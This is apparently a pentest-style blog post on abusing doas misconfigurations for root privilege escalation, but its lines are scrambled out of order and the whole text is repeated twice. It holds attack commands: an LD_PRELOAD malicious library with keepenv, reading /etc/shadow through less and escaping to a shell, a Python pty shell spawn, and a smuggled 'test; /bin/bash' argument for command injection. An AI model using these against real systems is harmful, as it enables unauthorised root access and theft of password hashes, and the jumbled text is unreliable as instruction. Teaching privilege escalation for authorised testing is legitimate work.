Hacktricks Doas Apr 2026
Example script:
gcc -shared -fPIC evil.c -o evil.so LD_PRELOAD=./evil.so doas -n id If doas is called with unsanitized user input in a script.
In this post, we’ll break down how doas works, where to find it, and how to abuse it for privilege escalation during a pentest. doas was originally from OpenBSD. It allows users to execute commands as another user (usually root) with a minimal configuration file: /etc/doas.conf
Keep hacking. Keep escalating.
cat /etc/doas.conf permit|deny [options] identity as target cmd [args] Examples:
./script.sh "test; /bin/bash" permit persist user1 as root Once you run doas -n id with password once, subsequent commands don’t need a password for a few minutes.
permit nopass user1 as root Check:
doas /usr/bin/less /etc/shadow # inside less: !/bin/sh Or Python bypass:
permit keepenv user1 as root Compile a malicious lib:
doas /usr/bin/python3 -c 'import pty;pty.spawn("/bin/sh")' Many binaries allow shell escapes. hacktricks doas
doas -n id # uid=0(root) gid=0(root) Escalate:
If you’ve spent any time on BSD or modern Linux systems (like Alpine), you’ve probably seen doas lurking in the shadows. It’s the leaner, meaner cousin of sudo — simpler config, fewer CVEs, and still dangerous if misconfigured.
Example script:
gcc -shared -fPIC evil.c -o evil.so LD_PRELOAD=./evil.so doas -n id If doas is called with unsanitized user input in a script.
In this post, we’ll break down how doas works, where to find it, and how to abuse it for privilege escalation during a pentest. doas was originally from OpenBSD. It allows users to execute commands as another user (usually root) with a minimal configuration file: /etc/doas.conf
Keep hacking. Keep escalating.
cat /etc/doas.conf permit|deny [options] identity as target cmd [args] Examples:
./script.sh "test; /bin/bash" permit persist user1 as root Once you run doas -n id with password once, subsequent commands don’t need a password for a few minutes.
permit nopass user1 as root Check:
doas /usr/bin/less /etc/shadow # inside less: !/bin/sh Or Python bypass:
permit keepenv user1 as root Compile a malicious lib:
doas /usr/bin/python3 -c 'import pty;pty.spawn("/bin/sh")' Many binaries allow shell escapes.
doas -n id # uid=0(root) gid=0(root) Escalate:
If you’ve spent any time on BSD or modern Linux systems (like Alpine), you’ve probably seen doas lurking in the shadows. It’s the leaner, meaner cousin of sudo — simpler config, fewer CVEs, and still dangerous if misconfigured.